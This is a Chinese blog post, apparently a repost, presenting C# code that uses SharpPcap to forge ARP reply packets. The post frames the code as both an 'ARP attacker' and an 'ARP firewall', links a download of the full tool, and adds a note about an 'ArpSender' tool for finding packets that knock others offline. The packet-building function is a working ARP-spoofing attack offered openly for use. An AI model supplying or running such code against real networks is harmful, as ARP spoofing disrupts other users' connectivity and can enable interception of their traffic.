c# 写的ARP攻击器和ARP防火墙

     首先你要先看看ARP是什么东西,我就不给你讲了。知道原理就行。

我这个代码是调用开源项目SharpPcap开源的网络捕获项目http://sourceforge.net/projects/sharppcap/

  这个项目和所有sniffer软件一样,是用wincap库的。需要安装wincap。http://www.winpcap.org/

 

核心代码贴出了,就是这么简单,手动构造ARP数据包,然后通过sharppcap里的库发送出去。。。

不停的发给自己正确的网关,那就是ARP防火墙。

不停的发给别人错误的网关,那就是ARP攻击器。

 
  
/// <summary>
/// 获取数据包
/// </summary>
/// <returns></returns>
public byte [] getPacket( byte [] yIP, byte [] mIP, byte [] yMAC, byte [] mMAC)
{
// ARP数据包
byte [] packet = new byte [] { 0xe0 , 0xcb , 0x4e , 0x2f , 0x8a , 0xc7 , 0x00 , 0x23 , 0xcd , 0x34 , 0x20 , 0x0e , 0x08 , 0x06 , 0x00 , 0x01 , 0x08 , 0x00 , 0x06 , 0x04 , 0x00 , 0x02 , 0x00 , 0x23 , 0xcd , 0x34 , 0x20 , 0x0e , 0xc0 , 0xa8 , 0x01 , 0x01 , 0xe0 , 0xcb , 0x4e , 0x2f , 0x8a , 0xc7 , 0xc0 , 0xa8 , 0x01 , 0x63 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x5d , 0x27 , 0xa1 , 0xb5 };

// 循环替换IP
for ( int i = 0 ; i < 4 ; i ++ )
{
packet[i
+ 28 ] = yIP[i];


packet[i
+ 38 ] = mIP[i];
}

// 循环替换MAC
for ( int i = 0 ; i < 6 ; i ++ )
{
packet[i
+ 22 ] = yMAC[i];
packet[i]
= mMAC[i];
packet[i
+ 6 ] = yMAC[i];
packet[i
+ 32 ] = mMAC[i];
}

return packet;
}
看看这个链接能下不  http://files.cnblogs.com/zifeiniu/ARP%E6%94%BB%E5%87%BB%E5%92%8C%E9%98%B2%E7%81%AB%E5%A2%99.rar

                             子非牛  QQ 378716196

转载于:https://www.cnblogs.com/zifeiniu/archive/2011/06/16/2083015.html

ArpSender是C#ARP发包器,的初衷是想试下什么样的ARP包才会引起ARP攻击,构造一些包可能会导致别人上不了网。至于包怎么填,发挥大家的想象吧,嘿嘿。 ArpSender用了SharpPcap这个开源API,有兴趣的到网上查下,用起来挺简单的。编程过程中最大的问题就是线程的问题。发包的代码中用了BackgroundWorker控件,因为参数只能传一个,并且线程是不允许直接调用主窗口控件,后来用了一个结构体struct ArpPac来传,感觉还是很麻烦啊!不过还好在BackgroundWorker的RunWorkerCompleted可以直接操作主窗口控件了,能把结果显示到主窗口上。 在编获取IP的MAC地址部分,一开始还是用BackgroundWorker,在获取存在的IP地址MAC时可以正常工作,可是当IP不存在是,DOWORK方法一直没结束。因为里面一个Resolve方法一直没返回,也没超时设定,线程就一直卡在那不动了。也不知道该怎么结束这个线程。于是改用了Thread,传参数用了个object数组,嘿嘿,所有参数都封起来。到了那边再解封,很好用。后来才发现,线程是没有返回值的。。又不能直接操作窗体控件。。没办法,只好设个全局变量来保存结果了。获取MAC部分还用了个Timer控件,1秒钟如果还没得到返回的MAC,直接结束该线程。。。 BackgroundWorker 用起来简单也很好用,如果有个abort方法的话。。。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值